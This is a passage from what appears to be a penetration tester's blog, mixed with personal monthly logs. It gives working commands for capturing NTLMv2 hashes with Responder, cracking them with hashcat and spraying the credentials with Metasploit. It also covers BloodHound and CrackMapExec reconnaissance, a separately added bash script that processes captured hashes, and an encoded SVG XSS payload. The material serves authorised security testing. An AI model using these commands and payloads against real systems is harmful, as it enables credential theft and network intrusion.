  strings Responder-Session.log | grep "NTLMv2-SSP Hash" | grep -iF ": $user:" | cut -d ":" -f 4-10 | head -n 1 | awk '{$1=$1};1' >> ntlm-hashes.txt
done

The results are saved into “ntlm-hashes.txt”. Note that it uses “>>” to redirect into that file, so if you run the loop again you will get duplicate hashes appended. Remember to delete the file before running the loop again.

Apart from that, the differences from the first command are: the cut takes columns “4-10” (the whole user::DOMAIN:challenge:response:blob line, which is exactly the format hashcat mode 5600 wants) instead of just “4-6”; the grep for the user is anchored with the surrounding colons so that “jsmith” does not also match “ajsmith”; and “head -n 1” keeps only the first occurrence of that user's hash.

I have added the “echo” command so that you can see it is doing its job. Otherwise this loop can take some time and you might get concerned.

For most intents and purposes this for loop will get you enough hashes to go attack. One thing worth filtering out first is machine accounts (usernames ending in “$”, such as WS01$): their passwords are long and random, so they will not crack and only waste hashcat time.

Hashcat command to crack NTLMv2 Hashes

On an x64 Windows system your command is this (from hashcat 6 onwards the binary is simply “hashcat.exe”):

hashcat64.exe -m 5600 <hashes file> <wordlist> -o <output file>
hashcat64.exe -m 5600 ntlm-hashes.txt Rocktastic12a -o cracked.txt

The “Rocktastic12a” is available for download from Nettitude. At around 13GB this is a reasonable wordlist that doesn’t go overboard at eating disk space. It is useful for most situations.

When hashes get cracked they will be saved in the output file (cracked.txt) where you can extract them for use.

Spraying Cracked Passwords using Metasploit

Metasploit includes the “smb_login” module which is usually used for password brute force attacks. It also has a “USERPASS_FILE” option, which takes a file of username and password pairs separated by a space, one pair per line, and tries each pair as given.

When making login attempts we need to also set the “SMBDomain” value appropriately. Before we get ahead of ourselves we need to determine how many domains we have credentials for:

cat cracked.txt | cut -d ":" -f 3 | sort -u -f

This will spit out an alphabetised list of domains that you have cracked hashes for. You will need to create one “USERPASS_FILE” for each domain. The following loop will do what you need:

for domain in `cat cracked.txt | cut -d ":" -f 3 | sort -u -f`
do
  # match on the domain field only (not the whole line), ignoring case, and keep
  # field 7 onwards so a cracked password containing ":" is not truncated
  awk -F: -v d="$domain" 'toupper($3) == toupper(d) { p = $7; for (i = 8; i <= NF; i++) p = p ":" $i; print $1 " " p }' cracked.txt >> userpass_$domain.txt
done

The output will be stored in one or more txt files called “userpass_*.txt”, each line being “username password”. As with the hash loop, the “>>” means you should delete old files before re-running.
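To pull the two loops above (first hash per user from Responder-Session.log, then one USERPASS_FILE per domain from the hashcat output) into something repeatable, here is an added bash example. It is not code from the original post: the function names are mine, the sample Responder log lines and cracked hashes it writes are constructed (hex fields shortened), and the timestamp prefix on the log lines is an assumption, which is why the parser keys off the “NTLMv2-SSP Hash” marker rather than counting colons. It also drops machine accounts, de-duplicates users case-insensitively, truncates its output files so re-runs do not append, and keeps cracked passwords that contain a colon.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): post-process Responder captures.
#  1. extract_unique_hashes - one NetNTLMv2 response per user@domain from Responder-Session.log
#  2. build_userpass_files  - one Metasploit USERPASS_FILE per domain from hashcat -o output
# The data written by write_sample_data is constructed; the real log's timestamp
# prefix is assumed, so we anchor on the "NTLMv2-SSP Hash" marker, not colon counts.

# extract_unique_hashes <Responder-Session.log> <out file>
# Prints the number of hashes written. Skips machine accounts (user ends in "$":
# long random passwords, never crack) and truncates <out file> on every run.
extract_unique_hashes() {
    local log="$1" out="$2"
    sed -n 's/.*NTLMv2-SSP Hash[[:space:]]*:[[:space:]]*//p' "$log" \
    | awk -F: '
        # hashcat 5600 layout: $1=user $2="" $3=domain $4=challenge $5=HMAC $6=blob
        substr($1, length($1), 1) == "$" { next }
        { key = tolower($1) "@" tolower($3) }
        !(key in seen) { seen[key] = 1; print }
      ' > "$out"
    wc -l < "$out" | tr -d ' '
}

# build_userpass_files <cracked.txt> <out dir>
# cracked.txt is hashcat "-o" output, <hash>:<password>, i.e. user::DOMAIN:chal:hmac:blob:password.
# Writes "<user> <password>" to <out dir>/userpass_<DOMAIN>.txt (domain upper-cased so mixed-case
# captures share a file); fields 7.. are re-joined so a ":" in the password survives.
# Prints the number of files written.
build_userpass_files() {
    local cracked="$1" dir="$2"
    mkdir -p "$dir"
    awk -F: -v dir="$dir" '
        {
            pass = $7
            for (i = 8; i <= NF; i++) pass = pass ":" $i
            file = dir "/userpass_" toupper($3) ".txt"
            print $1 " " pass > file   # awk ">" truncates on first open, appends within the run
        }
    ' "$cracked"
    ls "$dir" | wc -l | tr -d ' '
}

# write_sample_data <dir>: constructed inputs (duplicate user in two cases, a machine
# account, the same username in two domains, and a cracked password containing ":").
write_sample_data() {
    local dir="$1"
    cat > "$dir/Responder-Session.log" <<'EOF'
03/15/2021 09:12:01 AM - [SMB] NTLMv2-SSP Client   : 10.0.0.23
03/15/2021 09:12:01 AM - [SMB] NTLMv2-SSP Username : CORP\jsmith
03/15/2021 09:12:01 AM - [SMB] NTLMv2-SSP Hash     : jsmith::CORP:1122334455667788:11111111111111111111111111111111:0101000000000001
03/15/2021 09:12:40 AM - [SMB] NTLMv2-SSP Hash     : JSMITH::corp:8877665544332211:22222222222222222222222222222222:0101000000000002
03/15/2021 09:13:05 AM - [SMB] NTLMv2-SSP Hash     : WS01$::CORP:0123456789abcdef:33333333333333333333333333333333:0101000000000003
03/15/2021 09:14:11 AM - [SMB] NTLMv2-SSP Hash     : ajones::CORP:fedcba9876543210:44444444444444444444444444444444:0101000000000004
03/15/2021 09:15:59 AM - [SMB] NTLMv2-SSP Hash     : jsmith::LAB:0011223344556677:55555555555555555555555555555555:0101000000000005
03/15/2021 09:16:30 AM - [SMB] NTLMv2-SSP Hash     : bbrown::LAB:7766554433221100:66666666666666666666666666666666:0101000000000006
EOF
    cat > "$dir/cracked.txt" <<'EOF'
jsmith::CORP:1122334455667788:11111111111111111111111111111111:0101000000000001:Summer2021!
ajones::CORP:fedcba9876543210:44444444444444444444444444444444:0101000000000004:P@ss:word
bbrown::LAB:7766554433221100:66666666666666666666666666666666:0101000000000006:Welcome1
EOF
}

demo() {
    local tmp
    tmp="$(mktemp -d)"
    write_sample_data "$tmp"
    echo "unique hashes: $(extract_unique_hashes "$tmp/Responder-Session.log" "$tmp/ntlm-hashes.txt")"
    echo "userpass files: $(build_userpass_files "$tmp/cracked.txt" "$tmp/userpass")"
    cat "$tmp"/userpass/userpass_*.txt
    rm -rf "$tmp"
}

demo
```

Run it as-is to see the demo on the constructed data. On an engagement, point extract_unique_hashes at /usr/share/responder/logs/Responder-Session.log, crack the resulting file with the hashcat command above, and feed the hashcat output file to build_userpass_files; each userpass_<DOMAIN>.txt then goes straight into smb_login with the matching SMBDomain.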

For each target domain you now do this as the options into “smb_login”:

set SMBDomain <DOMAINNAME>
set USERPASS_FILE /path/to/userpass_domain.txt

Before hitting “exploit” you are going to need to tell Metasploit which hosts to log into using the “RHOSTS” option. As I am assuming you are on a legitimate penetration test you can be noisy on the network. You would NOT be doing this kind of thing on a red team engagement where you are being tasked with avoiding detection.

The “major yolo” is to spam these creds at literally every host that speaks SMB on TCP port 445. A single IP suddenly logging in across the network with multiple accounts would be like setting off a bunch of fireworks for the Blue Team to see. This is why you would only do this on a Pentest and not where you needed to be subtle.

The “minor yolo” is to look into the Responder logs folder and extract the IP addresses the captures came from: the <ip> in each “SMB-NTLMv2-SSP-<ip>.txt” filename is the workstation the user was logged into when Responder caught them. Those systems give you a high degree of certainty that the credentials are valid there ahead of time.

However you do it, set your “RHOSTS” appropriately and then type “run” (“exploit” also works). This will tell you which credentials were valid. It will also populate Metasploit's database of compromised credentials, which you can access via the “creds” command. You should definitely get comfortable using creds because it is a massive bonus having a queryable list of known valid credentials during an engagement. Because every pair you spray is a cracked, known-good password, each account gets a single successful attempt, so account lockout is not the concern here; the noise is.

Now what?

To recap we have gone from the perspective of an attacker on the LAN without any knowledge or passwords to a point where we have found valid domain credentials.

If you are lucky then some of the compromised credentials will already have elevated privileges and then you are pretty much done. Recently I had around 250 compromised accounts but every single one of them was only in the “Domain Users” group. So the rest of this assumes we have only those permissions: what can we do?

Domain Reconnaissance with Bloodhound

Bloodhound is fantastic. When you have access to a domain account you can gather data from your own machine using the Python ingestor (bloodhound.py):

python3 bloodhound.py -d <DOMAIN> -u <USERNAME> -p <PASSWORD> -gc <DOMAIN_CONTROLLER_ADDRESS> -c all

If name resolution for the domain does not work from your machine, point the ingestor at the domain controller for DNS with “-ns <DC_IP>”. If you have an interactive shell on a domain machine already then you can also use the other “ingestors” such as SharpHound.

This will create a bunch of .json files in the current working directory. There are plenty of blogs out there describing how to install the Bloodhound user interface. However, many of those are outdated in 2021 because it used to be more difficult. There is now an apt package, so using Docker is no longer the simplest route (although a container is ephemeral, which may be useful if you need to avoid caching customer data).

Install neo4j:

apt-get install neo4j

Then run that using this:

neo4j console

Follow the instructions spat out to the terminal. This will require you to use a web browser (http://localhost:7474) to log into the database with the default credentials neo4j/neo4j and set a new password. You will need to know these credentials so that Bloodhound can use neo4j later.

Next install bloodhound:

apt-get install bloodhound

So long as neo4j is running all you need to do is run your new command “bloodhound” at the terminal and enter your neo4j credentials and you are away!

Import those json files and then explore the UI to discover juicy information about the domain. You can use this to confirm how many users are in the “Domain Admins” group, what machines they are logged into, and loads more things.

Inspect SMB Shares

CrackMapExec is an amazing tool. It lets you specify a set of credentials and then blast through an entire network to determine which SMB shares they can access (its “--shares” option lists every share on each host along with whether you have READ or WRITE permission). It is often the case that insecure file permissions exist on these shares.

Prioritise exploring any share where you have write access. If that share has executables (.msi, .exe, .bat, .ps1 etc) then you have a chance to modify them. Doing so will give you an easy privilege escalation vector since the victim would execute the code you have supplied. Warning: do not do this without your customer’s permission.

If you have read access to any configuration files then go hunting for plain-text credentials. These will obviously give you lateral movement opportunities. It is common to gain access to databases using this technique.

If you have access to documents then go looking for juicy content. If there is an excel file that is heavily accessed then consider using dynamic data exchange (DDE) to execute commands on the PC’s of other users. Warning: this will prompt victims with security warnings before code executes, again do this with customer permission.

The documentation for CrackMapExec is fantastic. You can use it to do wonderful things so I recommend it with all my heart.

Then what?

I had to stop the journey somewhere. That is basically now. You should have gained access to significant resources by this point. You need to keep detailed notes as you did this so that you know exactly how you obtained which permissions or levels of access. The customer is going to thank you if the report is super clear about what you accessed and how you got there.

I make an appendix in my report called “Route to Domain Admin” where I start from the initial point and then as I progress through the levels of privilege I explain how. There may be several ways to do a certain step so you need to document them too.

Happy hunting.

Captain’s Log: May 2021

Here is how I did in the new condensed table format.

Target – Summary

11k steps a day – I hurt my ankle in March. I am out of this game for the foreseeable.
150 active minutes per week –
Week 1 – No.
Week 2 – No.
Week 3 – No.
Week 4 – No.

I am not getting “active” minutes (on the FitBit scale) on the exercise bike to the same degree I was from jogging. But I am doing 20 minutes at least 3 times a week. I am going out for walks with the kids and gardening at the weekends. None of this is seemingly counting on the FitBit scale.
1 technical blog a month – A cheeky wee post about XSS. Nothing too fancy. But highlighting that the techniques I blogged about a while back still pay out.
Support my partner to exercise – They stopped asking for this and I now am just taking the kids on wild adventures in and around the house for Saturday mornings. Counting down the days until I get vaccinated and feel willing to go to visitor attractions again like the Transport Museum.
Record five songs – I recorded a song for the Euro2020 campaign called Singing and Swinging. I knocked out a cheap video over the bank holiday weekend so that it can be shared on YouTube. The video is under the table.
OSWE – I’ll be honest I think this is a Winter time activity.
Panic Attacks – I didn’t get to full blown panic attack. But I did medically need sleep one day at the end of May. Kids were just popping up at random times of the night. I also did rather a lot of things in the evenings into the wee hours too many nights on the bounce. It settled down after I finally got some sleep.

Singing and Swinging

Other bits

  • Audiobooks 1 – carrying on with Stealing Light: Shoal, Book 1 by Gary Gibson. A good bit of Sci-Fi. With the school commute removed, and me no longer grinding out 11k steps a day otherwise I have barely touched the audiobooks. I should rethink my life!
  • Television 1 – Star Trek Voyager. I have not rewatched this in ages so it was a natural thing to give another go. I like it and think the performance of the Dr in particular stands out.
  • House – We finally got new windows installed having waited something like 6+ months. We moved at a point when you couldn’t get people to quote let alone fix anything. So this has been a massive boost. A new boiler has also gone in this month. I want to tackle at least painting everything now while we tread water for years waiting on the real work that I have to save up for.
  • Open Source – I got feedback from Daniel Card that my CVE-Offline project was out in the wild helping the Cyber 19 volunteers secure healthcare during covid-19. You never know where open source projects go or how they help. So this has been great to learn.
  • Research – [REDACTED BECAUSE WE HAVE NOT GOT THE CORPORATE BLOG POST OUT YET]. A bit of a tease I know.
  • Bank holiday weekend – I really needed this one to be good, and it really was. I BBQed twice. I did some gardening (well I murdered a bunch of stuff and trimmed things). I went for a walk in some trees with the kids. Did the whole “look at me I know things” stuff when Kid B walked through stinging nettles and I used a dock leaf to sort it out. Started a log fire in the garden at night and sat talking to my partner into the wee hours. It was a really relaxed long weekend and I just want more like it. I feel like we have been low on joy for a very long time and we are getting back to it.

That is the log for May.

XSS via HTML5 Events All over again

Back in 2018 I wrote a post about finding and exploiting XSS using the new(ish) event handlers in HTML 5. Those techniques paid out recently and I thought I’d write up the situation.

Using the lists provided in the earlier post I discovered the application allowed an “svg” tag, and within that tag it allowed the “onmouseenter” event handler, which is a useful one. This was not a classic XSS pop pop where the payload executes without user interaction, but an inline SVG occupies visible space on the page, so it would pop pop with a relatively likely movement of the mouse over the image.

The target disallowed certain characters and appeared to take a blacklist approach to keywords such as “alert”. The solution to my problem that day was to base64 encode the payload so that none of the blacklisted words appear literally in the request, use “atob” to decode it in the browser, and then “eval” to execute it, as listed below. (A Content-Security-Policy without 'unsafe-eval' would block the eval step, so this trick depends on there being no effective CSP.)

Raw Payload

alert(document.domain);

Base64 Encoded

YWxlcnQoZG9jdW1lbnQuZG9tYWluKTs=

Final Payload

<svg viewBox='0 0 100 100' onmouseenter=eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKTs='))></svg> 

Nothing Earth shattering in this but until you put stuff out there you never know who that will save time for when they are googling for “XSS SVG tag” or something like that. Welcome weary traveller. I know there is lots of SVG related XSS shenanigans to be had but if you wanted a file to upload you would be elsewhere!

Hope that helps.

Captain’s Log: April 2021

Here is how I did in the new condensed table format.

Target – Summary

11k steps a day – I hurt my ankle in March. I am out of this game for the foreseeable.
150 active minutes per week –
Week 1 – No. But I now have an exercise bike which I am starting a new journey on.
Week 2 – No.
Week 3 – No. Kids returned to school so I was walking rather than exercise.
Week 4 – No. Back on my bike now that school routine is established again.
1 technical blog a month – I sneaked out a wee post on enumerating RDP settings using PowerShell and released rdp-enum.
Support my partner to exercise – They stopped asking for this and I now am just taking the kids on wild adventures in and around the house for Saturday mornings. Counting down the days until I get vaccinated and feel willing to go to visitor attractions again like the Transport Museum.
Record five songs – I have recorded a mountain of partial songs. I just go sit in the garden and batter something out. Nothing quite fit for release this month.
OSWE – I have not prioritised it this month.
Panic Attacks – A clear month really. A few dicey moments but not full blown panic.

Other bits

  • Audiobooks 1 – carrying on with Stealing Light: Shoal, Book 1 by Gary Gibson. A good bit of Sci-Fi. With the school commute removed, and me no longer grinding out 11k steps a day otherwise I have barely touched the audiobooks. I should rethink my life!
  • Television 1 – Star Trek Discovery Season 3. Bravo to the makers they have really turned it around. While I didn’t hate STD season 1 and 2 I would say I was not in love with it. We didn’t get enough about the crew and the almost singular focus on one character was not working for me. It is Star Trek. I want some aliens. I want some exploration of humanity through the prism of different cultures. Maybe I like Season 3 because I have given up on that dream to some extent? Season 3 has been a breath of fresh air and we actively WANTED to watch the next episode. It was well done.
  • Television 2 – Titans. Oh wow… A DC property that isn’t just needlessly moody. With characters I know little or nothing about going into it. This show has been keeping me going on my exercise bike adventures. Like when I had a treadmill, I get a lot of TV shows watched while I exercise. I ran every minute of Sons of Anarchy, 24, and various other programmes in the past.
  • Game 1 – maquette. A PS Plus title of the month. It is gorgeous on so many levels. The sound track is sumptuous and the mechanics of the puzzles is so damn cute that your inner 5 year old will make you laugh. You honestly will.
  • Game 2 – Final Fantasy VII (remastered). I never played this before. I will start with that. Another PS Plus title which I would otherwise have not chosen to play. The story seems like it is going places. The kids are watching as I play along because of all the whizzy lights and swords and such. It is not a true open world because of the age of the title. You are very much on rails for the duration but it is going down well with me. Update: I finished this over the early May bank holiday before I got the post out. It was worth the time but suffered from massive cut scenes at times.

That is the log for April.